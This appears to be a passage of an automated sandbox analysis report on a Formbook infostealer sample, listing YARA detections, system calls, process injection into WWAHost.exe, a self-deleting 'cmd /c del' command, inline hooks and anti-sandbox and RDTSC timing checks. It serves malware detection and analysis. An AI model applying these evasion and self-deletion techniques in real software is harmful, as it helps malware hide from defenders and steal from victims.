            Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_0504E5E0
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_0504E5F0
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_0504C194
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_092F0006
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_092F0040
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_092F5B87
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_092F5B98
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0040102E
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00401030
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041DAD8
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041ED7F
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00402D87
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00402D90
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00409E50
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041D630
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00402FB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9EBB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C31FF1
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C32B28
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C32EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C322AE
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B86E30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7D5E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B60D20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C31D55
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6F900
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C32D07
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B090
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C320A8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7841F
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21002
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9D630
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A89E50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A82FB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A82D87
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A82D90
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9ED7F
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 03B6B150 appears 35 times
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A350 NtCreateFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A400 NtReadFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A480 NtClose,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A30A NtCreateFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A3FD NtReadFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A47A NtClose,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041A52B NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BAAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A350 NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A480 NtClose,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A400 NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A530 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A3FD NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A30A NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A47A NtClose,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9A52B NtAllocateVirtualMemory,
            Source: EH5ro3Hyug.exe, 00000000.00000002.689346150.0000000002D0F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000000.00000000.664879459.00000000008DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000000.00000002.688667693.0000000001050000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000005.00000000.685620813.000000000018C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000000.686555541.0000000000FEC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000002.757431344.00000000036E6000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exeBinary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: EH5ro3Hyug.exeVirustotal: Detection: 31%
            Source: EH5ro3Hyug.exeReversingLabs: Detection: 28%
            Source: EH5ro3Hyug.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EH5ro3Hyug.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@2/1
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: EH5ro3Hyug.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: EH5ro3Hyug.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: WWAHost.pdbUGP source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe, 0000000C.00000002.935271786.0000000003C5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: EH5ro3Hyug.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.EH5ro3Hyug.exe.810000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.0.EH5ro3Hyug.exe.f20000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.2.EH5ro3Hyug.exe.f20000.1.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 0_2_092FDC25 push FFFFFF8Bh; iretd
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041716F push ebx; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0040E288 push ebp; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041D4F2 push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041D4FB push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041D4A5 push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041D55C push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0041ED7F push dword ptr [F1875581h]; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A8E288 push ebp; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9716F push ebx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9D4A5 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9D4FB push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9D4F2 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9ED7F push dword ptr [F1875581h]; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_02A9D55C push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.04755215007

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE9
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.EH5ro3Hyug.exe.2c48584.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.689245304.0000000002C6F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: EH5ro3Hyug.exe PID: 6400, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000002A89904 second address: 0000000002A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000002A89B6E second address: 0000000002A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe TID: 6384Thread sleep time: -43496s >= -30000s
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe TID: 5296Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5988Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\WWAHost.exe TID: 5324Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00409AA0 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread delayed: delay time: 43496
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread delayed: delay time: 922337203685477
